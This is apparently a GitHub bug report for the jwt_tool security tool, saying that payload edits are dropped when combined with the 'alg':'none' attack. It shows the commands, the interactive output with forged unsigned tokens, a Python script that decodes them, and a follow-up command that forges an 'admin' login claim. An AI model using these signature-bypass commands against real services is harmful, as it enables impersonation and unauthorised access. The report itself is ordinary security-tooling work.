tempering is ignored when combined with an attack #84

Open
noraj opened this issue Oct 8, 2022 · 1 comment
noraj commented Oct 8, 2022

When combining tamper + an attack, the output token is the original token + the attack; the tampering is ignored.

For example:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -T -X a

...

Token payload values:
[1] login = "noraj"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of login is: noraj
Please enter new value and hit ENTER
> admin 
[1] login = "admin"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
jwttool_5f095c12269a0436e321cc1cff90399b - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e67565a408b902fbaee7f0551345ceec - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_09935cb7b6cadff540561326dd3688d1 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e8a178e70ccfaab8ad7ff0ae90add944 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.

The outputted token contains user noraj and not admin.
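
The report above can be checked by decoding the emitted tokens and comparing their payloads with the input token. This Python script is an added example, not part of the issue or of jwt_tool's own code; the function names are illustrative, and the tokens are the ones pasted in the report.

```python
import base64
import json

# Tokens copied from the issue: the input token and the four "alg":"none" outputs.
ORIGINAL = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw"
EMITTED = [
    "eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.",
    "eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.",
    "eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.",
    "eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.",
]
REQUESTED = {"login": "admin"}  # the edit entered at the -T prompt in the report


def b64url_decode(segment):
    # JWT segments are base64url with the padding stripped; restore it first.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token):
    """Return (header, payload) as dicts. The signature is not verified."""
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def changed_claims(original, emitted):
    """Map every claim that differs between the two payloads to (old, new)."""
    _, old = decode_jwt(original)
    _, new = decode_jwt(emitted)
    keys = sorted(set(old) | set(new))
    return {k: (old.get(k), new.get(k)) for k in keys if old.get(k) != new.get(k)}


def tamper_applied(emitted, requested):
    """True only if every requested claim edit is present in the emitted payload."""
    _, payload = decode_jwt(emitted)
    return all(payload.get(k) == v for k, v in requested.items())


def report(original=ORIGINAL, emitted=EMITTED, requested=REQUESTED):
    """One row per emitted token: (header alg, changed claims, edit applied?)."""
    rows = []
    for token in emitted:
        header, _ = decode_jwt(token)
        rows.append((header["alg"], changed_claims(original, token), tamper_applied(token, requested)))
    return rows


if __name__ == "__main__":
    for alg, diff, ok in report():
        print(f"alg={alg!r:8} changed_claims={diff} tamper_applied={ok}")
```

An empty `changed_claims` with `tamper_applied=False` on every row means the header was rewritten but the payload edit was dropped, which is the behaviour the report describes.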


noraj commented Oct 8, 2022

I know I can use this:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -X a -pc login -pv admin -I
